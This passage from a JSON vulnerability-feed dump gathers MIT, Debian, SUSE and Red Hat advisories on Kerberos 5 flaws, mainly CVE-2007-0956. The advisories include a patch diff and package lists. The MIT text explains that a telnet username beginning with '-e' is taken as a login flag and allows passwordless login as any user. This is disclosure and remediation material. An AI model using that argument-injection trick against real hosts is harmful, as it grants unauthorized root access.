cpp++&#41;\r\n argv = addarg&#40;argv, *cpp&#41;;\r\n }\r\n #endif\r\n- --- 1387,1405 ----\r\n } else\r\n #endif\r\n if &#40;getenv&#40;&quot;USER&quot;&#41;&#41; {\r\n! char *user = getenv&#40;&quot;USER&quot;&#41;;\r\n! if &#40;user[0] == &#39;-&#39;&#41; {\r\n! /* &quot;telnet -l-x ...&quot; */\r\n! syslog&#40;LOG_ERR, &quot;user name cannot start with &#39;-&#39;&quot;&#41;;\r\n! fatal&#40;net, &quot;user name cannot start with &#39;-&#39;&quot;&#41;;\r\n! exit&#40;1&#41;;\r\n! }\r\n! argv = addarg&#40;argv, user&#41;;\r\n #if defined&#40;LOGIN_ARGS&#41; &amp;&amp; defined&#40;NO_LOGIN_P&#41;\r\n {\r\n register char **cpp;\r\n for &#40;cpp = environ; *cpp; cpp++&#41;\r\n+ if &#40;&#40;*cpp&#41;[0] != &#39;-&#39;&#41;\r\n argv = addarg&#40;argv, *cpp&#41;;\r\n }\r\n #endif\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CVE-2007-0956\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0956\r\n\r\nCERT: VU#220816\r\nhttp://www.kb.cert.org/vuls/id/220816\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThis vulnerability was found when attempting to confirm the absence of\r\na related vulnerability in the Solaris telnetd. [CVE-2007-0882]\r\n\r\nDETAILS\r\n=======\r\n\r\nThe MIT krb5 telnet daemon fails to adequately check the provided\r\nusername. A malformed username beginning with &quot;-e&quot; can be interpreted\r\nas a command-line flag by the login.krb5 program, which is executed by\r\ntelnetd. This causes login.krb5 to execute part of the BSD rlogin\r\nprotocol, where an arbitrary username may be injected, allowing login\r\nas that user without a password or any further authentication.\r\n\r\nIf the telnet daemon is configured to only permit authenticated login,\r\nthen only authenticated users can exploit this vulnerability.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2007-04-03 original release\r\n\r\nCopyright &#40;C&#41; 2007 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 &#40;SunOS&#41;\r\n\r\niQCVAwUBRhKVRabDgE/zdoE9AQIzPAQAj8a7ShfHXVVMOPQhEyoN/Ydnalnfa2xE\r\ncl7UXFSjmkexalD+rymL0upLFw7EVgnYrVazc+AUhDLt1AZmCl5Lj2+WAcl1QYPu\r\nfEGm2SFaS4Eda6NRb6xZ4BeY8zfRWFN2G8Bb5krpGj+oEX/c3Xg8O4oUyiJBYBQi\r\nTXhryamn6Yw=\r\n=aE5C\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2007-04-04T00:00:00", "type": "securityvulns", "title": "MITKRB5-SA-2007-001: telnetd allows login as arbitrary user [CVE-2007-0956]", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2007-0956", "CVE-2007-0882"], "modified": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16558", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16558", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osv": [{"lastseen": "2022-08-10T07:06:26", "description": "\nSeveral remote vulnerabilities have been discovered in the MIT reference\nimplementation of the Kerberos network authentication protocol suite,\nwhich may lead to the execution of arbitrary code. The Common \nVulnerabilities and Exposures project identifies the following problems:\n\n\n* [CVE-2007-0956](https://security-tracker.debian.org/tracker/CVE-2007-0956)\nIt was discovered that the krb5 telnet daemon performs insufficient\n validation of usernames, which might allow unauthorized logins or\n privilege escalation.\n* [CVE-2007-0957](https://security-tracker.debian.org/tracker/CVE-2007-0957)\niDefense discovered that a buffer overflow in the logging code of the\n KDC and the administration daemon might lead to arbitrary code\n execution.\n* [CVE-2007-1216](https://security-tracker.debian.org/tracker/CVE-2007-1216)\nIt was discovered that a double free in the RPCSEC\\_GSS part of the \n GSS library code might lead to arbitrary code execution.\n\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge4.\n\n\nFor the upcoming stable distribution (etch) these problems have been fixed\nin version 1.4.4-7etch1.\n\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\n\nWe recommend that you upgrade your Kerberos packages.\n\n\n", "cvss3": {}, "published": "2007-04-03T00:00:00", "type": "osv", "title": "krb5 - several vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2022-08-10T07:06:10", "id": "OSV:DSA-1276-1", "href": "https://osv.dev/vulnerability/DSA-1276-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:05:42", "description": "\nIn certain application programs packaged in the MIT Kerberos 5 source\ndistribution, calls to setuid() and seteuid() are not always checked\nfor success and may fail with some PAM configurations. A local\nuser could exploit one of these vulnerabilities to result in privilege\nescalation. No exploit code is known to exist at this time.\n\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge3.\n\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.4.3-9.\n\n\nWe recommend that you upgrade your krb5 packages.\n\n\n", "cvss3": {}, "published": "2006-08-09T00:00:00", "type": "osv", "title": "krb5 - programming error", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2022-08-10T07:05:25", "id": "OSV:DSA-1146-1", "href": "https://osv.dev/vulnerability/DSA-1146-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:50:13", "description": "The krb5 telnet daemon allowed remote attackers to skip authentication and gain root access (CVE-2007-0956) A bug in the function krb5_klog_syslog() leads to a buffer overflow which could be exploited to execute arbitrary code (CVE-2007-0957). A double-free bug in the GSS-API library could crash kadmind. It's potentially also exploitable to execute arbitrary code (CVE-2007-1216).\n#### Solution\nThere is no known workaround, please install the update packages.", "cvss3": {}, "published": "2007-04-05T12:20:17", "type": "suse", "title": "remote code execution in krb5", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216"], "modified": "2007-04-05T12:20:17", "id": "SUSE-SA:2007:025", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-04/msg00006.html", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2021-10-19T20:38:46", "description": "Kerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found in the username handling of the MIT krb5 telnet daemon\r\n(telnetd). A remote attacker who can access the telnet port of a target\r\nmachine could log in as root without requiring a password. (CVE-2007-0956)\r\n\r\nNote that the krb5 telnet daemon is not enabled by default in any version\r\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\r\nremote access to the telnet port. This flaw does not affect the telnet\r\ndaemon distributed in the telnet-server package.\r\n\r\nFor users who have enabled the krb5 telnet daemon and have it accessible\r\nremotely, this update should be applied immediately. \r\n\r\nWhilst we are not aware at this time that the flaw is being actively\r\nexploited, we have confirmed that the flaw is very easily exploitable.\r\n\r\nThis update also fixes two additional security issues:\r\n\r\nBuffer overflows were found which affect the Kerberos KDC and the kadmin\r\nserver daemon. A remote attacker who can access the KDC could exploit this\r\nbug to run arbitrary code with the privileges of the KDC or kadmin server\r\nprocesses. (CVE-2007-0957)\r\n\r\nA double-free flaw was found in the GSSAPI library used by the kadmin\r\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\r\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux\r\n4 and 5 successful exploitation of this issue can only lead to a denial of\r\nservice. Applications which use this library in earlier releases of Red\r\nHat Enterprise Linux may also be affected. (CVE-2007-1216)\r\n\r\nAll users are advised to update to these erratum packages which contain a\r\nbackported fix to correct these issues.\r\n\r\nRed Hat would like to thank MIT and iDefense for reporting these\r\nvulnerabilities.", "cvss3": {}, "published": "2007-04-03T00:00:00", "type": "redhat", "title": "(RHSA-2007:0095) Critical: krb5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2019-03-22T19:42:36", "id": "RHSA-2007:0095", "href": "https://access.redhat.com/errata/RHSA-2007:0095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T04:44:01", "description": "Kerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found where some bundled Kerberos-aware applications would fail\r\nto check the result of the setuid() call. On Linux 2.6 kernels, the\r\nsetuid() call can fail if certain user limits are hit. A local attacker\r\ncould manipulate their environment in such a way to get the applications to\r\ncontinue to run as root, potentially leading to an escalation of\r\nprivileges. (CVE-2006-3083).\r\n\r\nUsers are advised to update to these erratum packages which contain a\r\nbackported fix to correct this issue.", "cvss3": {}, "published": "2006-08-08T00:00:00", "type": "redhat", "title": "(RHSA-2006:0612) krb5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083"], "modified": "2017-09-08T08:06:59", "id": "RHSA-2006:0612", "href": "https://access.redhat.com/errata/RHSA-2006:0612", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2023-05-02T17:34:23", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1276-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 3th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : krb5\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-0956 CVE-2007-0957 CVE-2007-1216\n\nSeveral remote vulnerabilities have been discovered in the MIT reference\nimplementation of the Kerberos network authentication protocol suite,\nwhich may lead to the execution of arbitrary code. The Common \nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2007-0956\n\n It was discovered that the krb5 telnet daemon performs insufficient\n validation of usernames, which might allow unauthorized logins or\n privilege escalation.\n\nCVE-2007-0957\n\n iDefense discovered that a buffer overflow in the logging code of the\n KDC and the administration daemon might lead to arbitrary code\n execution.\n\nCVE-2007-1216\n\n It was discovered that a double free in the RPCSEC_GSS part of the \n GSS library code might lead to arbitrary code execution.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.6-2sarge4.\n\nFor the upcoming stable distribution (etch) these problems have been fixed\nin version 1.4.4-7etch1.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your Kerberos packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge4.dsc\n Size/MD5 checksum: 782 a4a9a2cff9292af1de210f83edcee281\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6-2sarge4.diff.gz\n Size/MD5 checksum: 666048 006edbace85ee6fab561c8f5ba59914d\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.3.6.orig.tar.gz\n Size/MD5 checksum: 6526510 7974d0fc413802712998d5fc5eec2919\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.3.6-2sarge4_all.deb\n Size/MD5 checksum: 718724 9bd56e8f5a673661416a042cc315509b\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 114882 0b1d6a3f226b48f3065f8e065049a02a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 247602 b36d6e32ae319ed6953327d0de0e091c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 62892 a96ce75c69cc4423f0922a49ce97b7ef\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 137006 6285c054dbb18b511153aeab6d5bb399\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 89654 491c88a0bea723021f0f1eda84450208\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 72142 3cad8d2db4270a422c0ba0ccfd6a9151\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 144782 dea1c0c916c80b59174b4cfd18f1eb5e\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 201754 42d6fcb995989672cfde30a467f9486e\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 860980 3dabb660978f0d3cfc2c121acf8a48de\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_alpha.deb\n Size/MD5 checksum: 422446 d1a9263aa8929f74016c05d576aee119\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 104412 e8745bef65a969fc66e85f2e05fc460c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 216804 6cac5d3359fd89e684da8020737d3bf5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 56842 48564b65fede1322e806761578284afe\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 124622 63fdfbb8262a301fea57201abe745ccf\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 82604 9aa00994ff6db71ceea74e40774ec004\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 63404 9374de7ff3893edf7d15d59afe69014d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 137616 a3299d431fdeefc0a97cdf0dda8f0c32\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 177494 3343049ddfd8a6c6f92f72bb6d01236d\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 652190 4c662956e4fd6048718aafb636e86eb9\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_amd64.deb\n Size/MD5 checksum: 369222 2d5d91d193a1b9a974e94c7a6a285fa3\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 93246 da4123366ef29bedeb4c311b0a1a2126\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 192714 3f6ff7ed3a85692a519d42abd81eac0b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 53524 c3da0283dddf25e3b0c56ff8a96f4915\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 115350 cacaf8656e56b5d6b48cbebdb82e0867\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 74736 272dc94b86b09c30713f992eca1fe821\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 57966 ed7fb406f72392755271a6566c26f4a3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 127322 c7e623470e20fe820f542f39f4153a92\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 158514 54ea5f70bf9670248228abac564f3789\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 633650 746035ffc674dda29c2d210cec2b1fb2\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_arm.deb\n Size/MD5 checksum: 329018 361b300241f40c9ca6b19699e9a21808\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 104264 d76de2355f7087f0fb714f74df37ce8f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 223960 87e7ec87182ecdbfdf78cb8b671b4938\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 59164 e402fcaf185e9b71a8c22ed66360cc5c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 124948 17782c833aa2b3a5913e43486babdd75\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 81792 8abee5e8628ca43b28a9817b525e51e7\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 64084 833c24350b1da5c5ee344091b7326162\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 138992 1de0af508b0209ed74c55cf2360600d1\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 187080 a8e725187772da6af103407ddc837805\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 669466 df7019788a52698f5fca94b5a6b636d1\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_hppa.deb\n Size/MD5 checksum: 383676 3b3d54cdeff6e16d5999a77b05bdef56\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 95302 4ebb65f09a2813e7a87099683a76a936\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 191318 e84d322bdd6aa2880dfba7777b081afa\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 52708 25c09098ba171b5870e03138c3fb8c07\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 116110 00e1857255939453af3e38584e52d75d\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 75686 21feee38a4073694deae7a94b7c74961\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 57572 57277b50a393a4b804f6e44e8fbed14c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 127714 424e2d5b62373d8d903b0610e1c096f1\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 165536 aba5e1342c5c0d993b45d79ba7733b93\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 574568 bcde4ee063fa9ad80072f9e60af18a48\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_i386.deb\n Size/MD5 checksum: 349210 b5e0a23fa9d19709e2541d1247646c53\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 133654 bd3a80a682b7e2d0f49bea38add8b426\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 289234 47157a53b52eb93c0d887525abd3fe58\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 73454 bd64fc888c121da2bc69c596e49216eb\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 165084 526977361ce8f1d141ab6a0d4d57e11c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 105104 6c50a30d0b208f9e38324172041c4473\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 79786 d065a2fb8f537da0af521d39eb7f4686\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 167214 0072423f9707a6040e9ee4240014e26b\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 240194 ce4208e768989f5c2f4ca14a8e717143\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 889856 455bc01c17e013c07afaa6463cc4f94a\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_ia64.deb\n Size/MD5 checksum: 502200 75cf74775886ec0d713c7e7ff069eacd\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 88346 18046c57ad2f6d296e4546d20615d2c0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 173992 c6c7ca503f6cbf8e7ed89efdd553f06c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 49570 d1e0e9469cb6b463125de79f3a76a833\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 107426 92711b4028325787ece8018089244f85\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 70924 946c93da54740dcd2200d87b60be99cd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 53268 505c5f0e7082216305e047ac76acc2e0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 121914 f3412080c6c058538a1da06a7f379fa5\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 147644 212a5def1b0f371be806a47ba5e14da7\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 515768 ab442500a068df4ae71a7cad9172381b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_m68k.deb\n Size/MD5 checksum: 305692 0b36bd762b51f0ea9870cfc093a17fa7\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 103118 c5911de1a7b6faaaaea463e42cb6ca37\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 226616 d71a001774ff8acedc64d619fbb129b2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 57958 7618bb356ce7a5d2e884a717b671e045\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 129168 72c873bb4b1772a1dde04cf452bf204e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 81578 09ffcb6dd51efa8554efd45e802c709f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 65290 eb9453f215ecac2960954dfb8ca5c79b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 146674 2b1eac4315d219561a3c2322716c3e58\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 163958 eda48e4e6a6eea35ed81f2eea1e41383\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 679868 eb43a541790a82e14df96703ddc48d5d\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.3.6-2sarge4_mips.deb\n Size/MD5 checksum: 355200 49b45ff31e6a7a20f4198871a33f8697\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 103366 e814978c4614f069f9904e9e690779b3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 226340 ca1e35633c18a80b74fb5ba99066523b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 57978 2bac56dae5d980b9e98ae015e7c20ea7\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 129948 c3e08687a0cd77db3b11acda86e053b9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 81854 1e23c8b5144202406c755e2b73c760aa\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.3.6-2sarge4_mipsel.deb\n Size/MD5 checksum: 65060 